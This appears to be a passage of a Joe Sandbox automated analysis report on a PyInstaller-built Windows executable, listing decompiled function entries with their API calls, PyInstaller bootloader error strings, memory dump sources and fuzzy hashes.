                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF128672E1C1438AFB24BE14E0966B9B6A1FB40755F944135DEDAC6ACCDF7CE8809B10
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                • Opcode ID: d867eea9b736dd05fb7db999da78ff363ac8c1b1cc00f418ae9ba02d40a40477
                                                                                                                                                                                                                                • Instruction ID: 7459360ec29d47892f7ca7b3f226f9c7bfae7500f501a5feadf30b27caba8821
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d867eea9b736dd05fb7db999da78ff363ac8c1b1cc00f418ae9ba02d40a40477
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB416F22B1C6528AEA10FB51AC926B96390FF85BC4F544432ED4C8BB9FDE3CE5058740
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                • Opcode ID: b80b08f7cfde0f81c8538706a0795345a627625e20aad4e8d4f4917b79e24954
                                                                                                                                                                                                                                • Instruction ID: f54d446251908911f64f5b2f4d617ffb33ebb7b5daef46f80cba576e1df611c2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b80b08f7cfde0f81c8538706a0795345a627625e20aad4e8d4f4917b79e24954
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B416022B1C6428EEB14FB2198925B96390FF84B94F444536ED4D97B9EEF3CE501C704
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                • Instruction ID: f8330fd1725a1a2278a1144c19ed880de9d01afa05512aeb3700ab5d900907b7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86D15E22A0C7418AFB60FB6598923BDBBA0FB55788F104535DE4D97B9ADF38E491C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872C9E
                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF644873706,?,00007FF644873804), ref: 00007FF644872D63
                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF644872D99
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                • Instruction ID: 9403c8673401f80a69e7cffd16a5ecb000d3d4a53e4aec06535fd581193eb089
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1731E82270CB4146E720BB25B8916AA6691BFC8B98F414136EF4DD3B5DEF3CD506C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DD4D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DD5B
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DD85
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DDF3
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF64487DF7A,?,?,?,00007FF64487DC6C,?,?,?,00007FF64487D869), ref: 00007FF64487DDFF
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                • Instruction ID: 6a837562c8b4d135d430ccc6166c386bbaccc413c31492c88e02c2c725605bf4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F318721B1EA42DAEE11FB169C925B527D4FF48BA4F598536DD2D87388EF3CE4448310
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                • Opcode ID: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                • Instruction ID: 021450b99195abb182eb78ddebe253e38f3fe9423bc474d40665ae69ee38e4bb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2df6df0904ecf2e68063807813f252f2c523520ae69ca8fe89000ee1ae80a761
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9418121B1CA86D9EA11FB20E8A61E96351FF94394F900132DE5C8369DEF3CE505C740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF64487351A,?,00000000,00007FF644873F1B), ref: 00007FF644872AA0
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                • Instruction ID: 48c668cb77eb8570dffbbe990ad76f74f03ae4f8b597ce6cd77e2415a8efa627
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38216D22B1DB8186E720BB51B8927E6A294BB88784F400136EE8D93A5DDF7CD2458740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                • Instruction ID: a068081b1ad647b364f6ad8202f0667a0feb1ebce3b1417bd714d0b92f124744
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC212F24B0D6428DF969B3619AD713961525FC4BB0F144634EE3EDAADEDE2CF4408301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                • Instruction ID: 828454efcfa034140589112358b03fffd4cc8a91845e4d36557791bea7db6807
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB114C21B1CE41CAE750BB52A896329A6A0FB88FE4F044634EE5DC77A8DF7DD854C740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644878EFD
                                                                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644878F5A
                                                                                                                                                                                                                                  • Part of subcall function 00007FF644879390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6448745F4,00000000,00007FF644871985), ref: 00007FF6448793C9
                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644878FE5
                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644879044
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF644879055
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF644873FA9), ref: 00007FF64487906A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                                                                • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                • Instruction ID: ea800eb5fccd425ef51aff986e17c76569fcd7bf882b6aca6ee07065e78cff51
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0419362B1D68289FA30BB12A9922BA73A4FB95BD4F450135DF4D9778DDE3CE500C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B2D7
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B30D
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B33A
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B34B
                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B35C
                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF644884F11,?,?,?,?,00007FF64488A48A,?,?,?,?,00007FF64488718F), ref: 00007FF64488B377
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                • Instruction ID: 684177b36193b1b24bf5b413935c2ba1f59ef53dd8a831283c63d5280a02d0e5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 59113830B4C6428AFA59B7659AD713D62829FC4BB0F044634EE2ED6ADEDE2CF4018301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF644871B6A), ref: 00007FF64487295E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                • Instruction ID: c20a647caed65085ac9ef6587e4d0c427b5eeee04c72160e1ea21244308e7c28
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2231B322B1CA815AE720B765BC926E66295BF887D8F440132EE8DD3B5DEF3CD5468300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206498057.00007FF64489B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206549295.00007FF6448B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206672091.00007FF6448B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff644870000_sB2ClgrGng.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                • String ID: Unhandled exception in script
                                                                                                                                                                                                                                • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                • Instruction ID: a82264effe2ec24202ea947d750503a123ebcf04e50caae4233acd9fbfa6f3ac
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4831D866A1DA8289EB24FB61AC962F96360FF89B84F440135EE4D87A59EF3CD1458700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF64487918F,?,00007FF644873C55), ref: 00007FF644872BA0
                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF644872C2A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2206444577.00007FF644871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF644870000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2206392580.00007FF644870000.00000002.00000001.01000000.00000003.sdmpDownload File
